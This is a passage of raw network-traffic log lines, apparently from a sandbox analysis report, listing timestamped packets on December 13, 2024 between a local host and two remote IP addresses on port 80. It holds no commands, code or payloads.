                                                              Dec 13, 2024 07:47:45.799748898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799778938 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799812078 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799841881 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799876928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799905062 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799936056 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800535917 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800590992 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800648928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800662994 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800683022 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800712109 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800735950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800765038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800787926 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800817013 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800883055 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800910950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800910950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800910950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800940990 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800962925 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.800991058 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801013947 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801042080 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801064014 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801090002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801119089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801141024 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801168919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801189899 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801218987 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801239967 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801266909 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801291943 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801320076 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801347017 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801933050 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801945925 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801945925 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801959038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.801997900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802014112 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802031040 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802054882 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802083015 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802104950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802165985 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802176952 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802176952 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802202940 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802223921 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802249908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802270889 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802295923 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802316904 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802344084 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802371979 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802418947 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802418947 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802448988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802469015 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802495003 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802515030 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802541018 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802560091 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802587986 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802613020 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.802635908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.810957909 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.810957909 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.810957909 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811002970 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811017036 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811063051 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811110973 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811125040 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811147928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811182022 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811202049 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811230898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811295033 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811309099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811309099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811335087 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811357975 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811382055 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811410904 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811444998 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811476946 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811502934 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811532021 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811577082 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811590910 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811616898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811633110 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811664104 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811686039 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811714888 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811742067 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811765909 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.811800003 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823174000 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823232889 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823232889 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823254108 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823282003 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823306084 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823340893 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823358059 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823379993 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823426962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823426962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823455095 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823518038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823533058 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823545933 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823606968 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823651075 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823672056 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823715925 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823735952 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823802948 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823843002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823863983 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823890924 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823913097 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823940992 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823968887 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.823996067 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.831269979 CET8049774185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:45.832856894 CET4977480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:45.841177940 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841376066 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841412067 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841561079 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841595888 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841628075 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841734886 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841773987 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841808081 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841836929 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841866016 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841898918 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841932058 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.841967106 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842008114 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842037916 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842067003 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842104912 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842138052 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842174053 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842498064 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842541933 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842571974 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842679977 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842679977 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.842701912 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843095064 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843203068 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843203068 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843282938 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843338966 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843367100 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843390942 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843416929 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843462944 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843522072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843564987 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843595982 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843628883 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843663931 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843691111 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843725920 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843784094 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843833923 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843858004 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843908072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843944073 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.843980074 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844069004 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844116926 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844209909 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844233036 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844263077 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844285965 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844316959 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844405890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844405890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844429016 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844453096 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844481945 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844508886 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844579935 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844599009 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844624996 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844650030 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844679117 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844702005 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844726086 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844748974 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844774961 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844794989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844825983 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844842911 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844871998 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844892025 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844918013 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844939947 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844965935 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.844991922 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845216990 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845238924 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845268011 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845287085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845313072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845333099 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845360041 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845385075 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845413923 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845432997 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845458031 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845479012 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845506907 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845525980 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845554113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845572948 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845602036 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845623016 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845648050 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845666885 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845691919 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845714092 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845742941 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845763922 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845789909 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845810890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845835924 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845856905 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.845881939 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846003056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846030951 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846052885 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846081018 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846097946 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846122980 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846143007 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846170902 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846199989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846276999 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846297979 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846326113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846345901 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846374989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846436024 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846466064 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846488953 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846515894 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846539021 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846564054 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846585989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846615076 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846637011 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846667051 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846729994 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846755028 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846776009 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846801996 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846823931 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.846849918 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847116947 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847151041 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847364902 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847398043 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847423077 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847453117 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847475052 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847502947 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847527981 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847551107 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847572088 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847609043 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847635031 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847662926 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847681999 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847709894 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847733021 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847757101 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847779036 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847803116 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847822905 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847848892 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847870111 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847896099 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847914934 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847940922 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847965002 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.847990036 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848018885 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848128080 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848150969 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848176956 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848201036 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848228931 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848299980 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848328114 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848350048 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848376989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848400116 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848495007 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848540068 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848565102 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848593950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848665953 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848694086 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848717928 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848743916 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848768950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848794937 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848814964 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848841906 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848861933 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848886967 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848907948 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848937988 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848963022 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.848987103 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849174976 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849209070 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849232912 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849261045 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849280119 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849307060 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849330902 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849355936 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849380970 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849407911 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849427938 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849462986 CET4977680192.168.2.4185.81.68.147
